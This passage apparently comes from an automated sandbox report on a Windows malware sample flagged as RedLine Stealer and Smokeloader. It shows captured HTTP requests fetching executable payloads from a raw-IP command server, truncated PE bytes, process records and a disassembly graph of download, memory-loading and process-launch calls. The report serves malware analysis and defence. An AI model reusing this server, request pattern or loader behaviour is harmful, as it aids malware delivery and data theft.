                                                            Date: Tue, 08 Oct 2024 08:08:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=89
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:29.693419933 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:29.976442099 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:29 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=88
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:32.015285969 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:32.253798962 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:32 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=87
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:34.271671057 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:34.964449883 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:34 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=86
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:38.037252903 CEST393OUTGET /soft/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: d
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:38.298378944 CEST1236INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:38 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="dll";
                                                            Content-Length: 242176
                                                            Keep-Alive: timeout=5, max=85
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                            Oct 8, 2024 10:08:39.387662888 CEST393OUTGET /soft/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: s
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:39.751545906 CEST1236INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:39 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="soft";
                                                            Content-Length: 1502720
                                                            Keep-Alive: timeout=5, max=84
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:04:07:58
                                                            Start date:08/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe"
                                                            Imagebase:0x400000
                                                            File size:307'200 bytes
                                                            MD5 hash:B1281430B4F8C39015940B1E5DC9D569
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:04:08:03
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:04:08:04
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:04:08:05
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:04:08:05
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:04:08:06
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:04:08:07
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1016
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:04:08:44
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:04:08:46
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:04:09:32
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3%
                                                              Dynamic/Decrypted Code Coverage:17.3%
                                                              Signature Coverage:14.9%
                                                              Total number of Nodes:1210
                                                              Total number of Limit Nodes:24
                                                              execution_graph 41992 401840 41993 4018a9 InternetSetFilePointer InternetReadFile 41992->41993 41994 40193d CallUnexpected 41993->41994 41995 401962 HttpQueryInfoA 41994->41995 41996 401ce5 41995->41996 41997 401986 CoCreateInstance 41995->41997 42049 40cd83 41996->42049 41997->41996 42000 4019bf 41997->42000 41999 401d10 42000->41996 42020 402460 42000->42020 42002 401a1c MultiByteToWideChar 42035 40cfd1 42002->42035 42004 401a6e MultiByteToWideChar 42005 401ad0 42004->42005 42005->42005 42046 402300 27 API calls 4 library calls 42005->42046 42007 401bc0 std::ios_base::_Ios_base_dtor 42009 401cb1 42007->42009 42012 40cfd1 27 API calls 42007->42012 42008 401aec 42008->42007 42010 401d16 42008->42010 42009->41996 42056 411337 42010->42056 42014 401bf7 42012->42014 42014->42009 42015 40cfd1 27 API calls 42014->42015 42019 401c84 42014->42019 42016 401c74 42015->42016 42047 401470 25 API calls 4 library calls 42016->42047 42048 401470 25 API calls 4 library calls 42019->42048 42024 40247e _Yarn 42020->42024 42025 4024a4 42020->42025 42021 40258e 42063 401660 27 API calls 42021->42063 42023 402593 42064 4015c0 27 API calls 3 library calls 42023->42064 42024->42002 42025->42021 42027 4024f8 42025->42027 42028 40251d 42025->42028 42027->42023 42061 4015c0 27 API calls 5 library calls 42027->42061 42032 402509 _Yarn 42028->42032 42062 4015c0 27 API calls 5 library calls 42028->42062 42029 402598 42033 411337 25 API calls 42032->42033 42034 402570 std::ios_base::_Ios_base_dtor 42032->42034 42033->42021 42034->42002 42037 40cf93 42035->42037 42038 40cfb2 42037->42038 42041 4015c0 Concurrency::cancel_current_task 42037->42041 42067 41657c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42037->42067 42068 4133dd 42037->42068 42038->42004 42040 40cfbe 42040->42040 42041->42040 42065 40e393 RaiseException 42041->42065 42043 4015dc 42066 40e131 26 API calls 2 library calls 42043->42066 42045 401603 42045->42004 42046->42008 42047->42019 42048->42009 42050 40cd8b 42049->42050 42051 40cd8c IsProcessorFeaturePresent 42049->42051 42050->41999 42053 40cdd3 42051->42053 42077 40cd96 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42053->42077 42055 40ceb6 42055->41999 42078 4112c3 25 API calls 3 library calls 42056->42078 42058 411346 42079 411354 11 API calls CallUnexpected 42058->42079 42060 411353 42061->42032 42062->42032 42064->42029 42065->42043 42066->42045 42067->42037 42073 41a395 __Getctype 42068->42073 42069 41a3d3 42076 411401 14 API calls __dosmaperr 42069->42076 42071 41a3be RtlAllocateHeap 42072 41a3d1 42071->42072 42071->42073 42072->42037 42073->42069 42073->42071 42075 41657c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42073->42075 42075->42073 42076->42072 42077->42055 42078->42058 42079->42060 42080 402c60 42081 402c84 SetLastError 42080->42081 42082 402cac 42080->42082 42158 402910 67 API calls 42081->42158 42084 402cb6 42082->42084 42086 402cf1 SetLastError 42082->42086 42093 402d19 42082->42093 42159 402910 67 API calls 42084->42159 42085 402c96 42087 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42085->42087 42160 402910 67 API calls 42086->42160 42090 402ca8 42087->42090 42091 402cc0 SetLastError 42094 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42091->42094 42092 402d03 42095 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42092->42095 42093->42084 42097 402d84 GetNativeSystemInfo 42093->42097 42098 402cdd 42094->42098 42096 402d15 42095->42096 42097->42084 42099 402db3 VirtualAlloc 42097->42099 42100 402df3 GetProcessHeap HeapAlloc 42099->42100 42101 402dcd VirtualAlloc 42099->42101 42102 402e10 VirtualFree 42100->42102 42103 402e24 42100->42103 42101->42100 42104 402ddf 42101->42104 42102->42103 42105 402e6c SetLastError 42103->42105 42106 402e8e VirtualAlloc 42103->42106 42161 402910 67 API calls 42104->42161 42109 402e74 42105->42109 42115 402ea7 _Yarn CallUnexpected 42106->42115 42108 402de9 42108->42100 42162 4033c0 16 API calls _Yarn 42109->42162 42111 402e7b 42112 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42111->42112 42113 402e8a 42112->42113 42115->42105 42115->42109 42116 402f8c 42115->42116 42134 402be0 VirtualAlloc 42115->42134 42135 402a70 42116->42135 42117 403155 42118 402940 50 API calls 42117->42118 42119 403166 42118->42119 42119->42109 42124 40316e 42119->42124 42120 40302c 42120->42109 42120->42117 42143 402940 42120->42143 42122 4031fa 42125 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42122->42125 42123 4031aa 42126 4031e4 42123->42126 42127 4031b5 42123->42127 42124->42122 42124->42123 42129 403210 42125->42129 42128 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42126->42128 42131 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42127->42131 42130 4031f6 42128->42130 42132 4031e0 42131->42132 42134->42115 42136 402bcc 42135->42136 42137 402a90 42135->42137 42136->42120 42137->42136 42138 402bbb SetLastError 42137->42138 42139 402b9e SetLastError 42137->42139 42141 402b7f SetLastError 42137->42141 42138->42120 42139->42120 42141->42120 42144 402959 42143->42144 42153 402995 42143->42153 42145 402964 42144->42145 42146 4029ae VirtualProtect 42144->42146 42145->42153 42163 402c00 VirtualFree 42145->42163 42149 4029f2 GetLastError FormatMessageA 42146->42149 42146->42153 42147 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42148 4029aa 42147->42148 42148->42120 42150 402a17 42149->42150 42150->42150 42151 402a1e LocalAlloc 42150->42151 42164 4028d0 42 API calls 42151->42164 42153->42147 42154 402a41 OutputDebugStringA LocalFree LocalFree 42155 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42154->42155 42156 402a67 42155->42156 42156->42120 42158->42085 42159->42091 42160->42092 42161->42108 42162->42111 42163->42153 42164->42154 42165 10001f20 42208 10005956 GetSystemTimeAsFileTime 42165->42208 42167 10001f48 42210 100059d5 42167->42210 42169 10001f4f 42213 10001523 42169->42213 42171 10002174 42243 100010a3 42171->42243 42176 10002025 42246 10001cdd 44 API calls __EH_prolog3_GS 42176->42246 42179 1000202e 42207 10002164 42179->42207 42247 100059b4 27 API calls _unexpected 42179->42247 42181 10001bb9 15 API calls 42183 10002172 42181->42183 42182 10002040 42248 10001c33 29 API calls 42182->42248 42183->42171 42185 10002052 42249 10002493 17 API calls __InternalCxxFrameHandler 42185->42249 42187 1000205f 42250 10002230 17 API calls __InternalCxxFrameHandler 42187->42250 42189 10002079 42251 10002230 17 API calls __InternalCxxFrameHandler 42189->42251 42191 1000209f 42252 1000219f 17 API calls __InternalCxxFrameHandler 42191->42252 42193 100020a9 42253 10001bb9 42193->42253 42196 10001bb9 15 API calls 42197 100020bb 42196->42197 42198 10001bb9 15 API calls 42197->42198 42199 100020c4 42198->42199 42257 10001725 8 API calls _ValidateLocalCookies 42199->42257 42201 100020df 42202 10002100 CreateProcessA 42201->42202 42203 10002135 42202->42203 42204 1000213c ShellExecuteA 42202->42204 42203->42204 42205 1000215b 42203->42205 42204->42205 42206 10001bb9 15 API calls 42205->42206 42206->42207 42207->42181 42209 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42208->42209 42209->42167 42258 10006e9c GetLastError 42210->42258 42214 1000152f __EH_prolog3_GS 42213->42214 42291 1000184b 42214->42291 42216 10001541 42218 10001593 42216->42218 42226 1000179a 17 API calls 42216->42226 42295 1000190a 42218->42295 42219 100015ff 42300 1000179a 42219->42300 42221 1000160d 42305 10005939 42221->42305 42224 10001650 InternetSetOptionA InternetConnectA 42227 10001692 HttpOpenRequestA 42224->42227 42228 100016e8 InternetCloseHandle 42224->42228 42225 100016eb 42229 10001704 42225->42229 42354 10001bdc 15 API calls 42225->42354 42226->42218 42232 100016e2 InternetCloseHandle 42227->42232 42233 100016bc 42227->42233 42228->42225 42231 10001bb9 15 API calls 42229->42231 42234 1000171b 42231->42234 42232->42228 42308 100010c7 42233->42308 42355 1000e8a5 42234->42355 42239 100016d3 42322 10001175 42239->42322 42240 100016df InternetCloseHandle 42240->42232 42244 100010ad 42243->42244 42245 100010bd CoUninitialize 42244->42245 42246->42179 42247->42182 42248->42185 42249->42187 42250->42189 42251->42191 42252->42193 42254 10001bc4 42253->42254 42255 10001bcc 42253->42255 42406 10001bdc 15 API calls 42254->42406 42255->42196 42257->42201 42259 10006eb3 42258->42259 42260 10006eb9 42258->42260 42283 10007580 6 API calls __dosmaperr 42259->42283 42264 10006ebf SetLastError 42260->42264 42284 100075bf 6 API calls __dosmaperr 42260->42284 42263 10006ed7 42263->42264 42265 10006edb 42263->42265 42271 10006f53 42264->42271 42272 100059df 42264->42272 42285 10007aa7 12 API calls 2 library calls 42265->42285 42268 10006ee7 42269 10006f06 42268->42269 42270 10006eef 42268->42270 42287 100075bf 6 API calls __dosmaperr 42269->42287 42286 100075bf 6 API calls __dosmaperr 42270->42286 42290 10006928 27 API calls CallUnexpected 42271->42290 42272->42169 42277 10006f12 42279 10006f16 42277->42279 42280 10006f27 42277->42280 42278 10006efd 42278->42264 42288 100075bf 6 API calls __dosmaperr 42279->42288 42289 10006c9e EnterCriticalSection LeaveCriticalSection __dosmaperr 42280->42289 42283->42260 42284->42263 42285->42268 42286->42278 42287->42277 42288->42278 42289->42278 42292 10001868 42291->42292 42292->42292 42293 1000190a 17 API calls 42292->42293 42294 1000187c 42293->42294 42294->42216 42296 10001978 42295->42296 42299 10001920 __InternalCxxFrameHandler 42295->42299 42358 10001a59 17 API calls std::_Xinvalid_argument 42296->42358 42299->42219 42301 100017b3 __InternalCxxFrameHandler 42300->42301 42302 100017eb 42300->42302 42301->42221 42359 10001884 17 API calls 42302->42359 42360 100070ee 42305->42360 42309 100010d3 __EH_prolog3_GS 42308->42309 42310 1000184b 17 API calls 42309->42310 42311 100010e3 HttpAddRequestHeadersA 42310->42311 42386 100017f1 42311->42386 42313 10001112 HttpAddRequestHeadersA 42314 100017f1 17 API calls 42313->42314 42315 10001132 HttpAddRequestHeadersA 42314->42315 42316 100017f1 17 API calls 42315->42316 42317 10001152 HttpAddRequestHeadersA 42316->42317 42318 10001bb9 15 API calls 42317->42318 42319 1000116d 42318->42319 42320 1000e8a5 5 API calls 42319->42320 42321 10001172 HttpSendRequestA 42320->42321 42321->42239 42321->42240 42323 10001184 __EH_prolog3_GS 42322->42323 42324 100011c5 InternetSetFilePointer 42323->42324 42325 100011e3 InternetReadFile 42324->42325 42327 1000121d __InternalCxxFrameHandler 42325->42327 42326 10001260 42328 1000127d HttpQueryInfoA 42326->42328 42327->42325 42327->42326 42329 100012a6 CoCreateInstance 42328->42329 42330 1000150a 42328->42330 42329->42330 42331 100012d8 42329->42331 42332 1000e8a5 5 API calls 42330->42332 42331->42330 42334 1000184b 17 API calls 42331->42334 42333 10001520 42332->42333 42333->42240 42335 100012f7 42334->42335 42391 10001006 20 API calls 42335->42391 42337 1000130c 42338 10001bb9 15 API calls 42337->42338 42344 1000134f 42338->42344 42339 1000149d 42395 10005926 12 API calls __dosmaperr 42339->42395 42340 10001427 __InternalCxxFrameHandler 42340->42339 42342 100014ae __InternalCxxFrameHandler 42340->42342 42345 100014aa 42340->42345 42342->42330 42343 100014a2 42397 1000584c 15 API calls __strnicoll 42343->42397 42344->42340 42344->42342 42348 10001456 42344->42348 42349 10001449 42344->42349 42345->42342 42396 10005926 12 API calls __dosmaperr 42345->42396 42348->42340 42393 10005926 12 API calls __dosmaperr 42348->42393 42392 10005926 12 API calls __dosmaperr 42349->42392 42351 1000144e 42394 1000584c 15 API calls __strnicoll 42351->42394 42354->42229 42398 100026ff 42355->42398 42357 10001722 42357->42171 42357->42176 42363 10007102 42360->42363 42361 10007106 42378 10001629 InternetOpenA 42361->42378 42379 10005926 12 API calls __dosmaperr 42361->42379 42363->42361 42365 10007140 42363->42365 42363->42378 42364 10007130 42380 1000584c 15 API calls __strnicoll 42364->42380 42381 100069d1 27 API calls 2 library calls 42365->42381 42368 1000714c 42369 10007156 42368->42369 42372 1000716d 42368->42372 42382 1000a31e 15 API calls __strnicoll 42369->42382 42371 100071ef 42371->42378 42383 10005926 12 API calls __dosmaperr 42371->42383 42372->42371 42373 10007244 42372->42373 42373->42378 42385 10005926 12 API calls __dosmaperr 42373->42385 42376 10007238 42384 1000584c 15 API calls __strnicoll 42376->42384 42378->42224 42378->42225 42379->42364 42380->42378 42381->42368 42382->42378 42383->42376 42384->42378 42385->42378 42387 100017ff 42386->42387 42387->42387 42388 1000180d __InternalCxxFrameHandler 42387->42388 42390 1000188f 17 API calls __InternalCxxFrameHandler 42387->42390 42388->42313 42390->42388 42391->42337 42392->42351 42393->42351 42394->42340 42395->42343 42396->42343 42397->42342 42399 10002707 42398->42399 42400 10002708 IsProcessorFeaturePresent 42398->42400 42399->42357 42402 10002b1c 42400->42402 42405 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42402->42405 42404 10002bff 42404->42357 42405->42404 42406->42255 42407 402080 42408 4020fb 42407->42408 42409 40209d 42407->42409 42411 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42408->42411 42409->42408 42410 4020a3 CreateFileA 42409->42410 42410->42408 42412 4020c3 WriteFile CloseHandle 42410->42412 42413 402109 42411->42413 42414 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42412->42414 42415 4020f5 42414->42415 42416 4034b0 CryptAcquireContextW 42417 4035fa GetLastError CryptReleaseContext 42416->42417 42418 40353e CryptCreateHash 42416->42418 42419 403744 42417->42419 42418->42417 42420 403562 42418->42420 42421 40376a std::ios_base::_Ios_base_dtor 42419->42421 42423 403792 42419->42423 42424 40cfd1 27 API calls 42420->42424 42422 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42421->42422 42425 40378e 42422->42425 42427 411337 25 API calls 42423->42427 42426 40359a 42424->42426 42442 41366b 42426->42442 42429 403797 42427->42429 42446 40e131 26 API calls 2 library calls 42429->42446 42432 4037c3 42433 4035d6 CryptDeriveKey 42433->42417 42435 403615 42433->42435 42434 4035c8 GetLastError 42434->42419 42436 4133dd _Yarn 15 API calls 42435->42436 42437 40361b _Yarn 42436->42437 42438 40cfd1 27 API calls 42437->42438 42441 40363a _Yarn 42438->42441 42439 403738 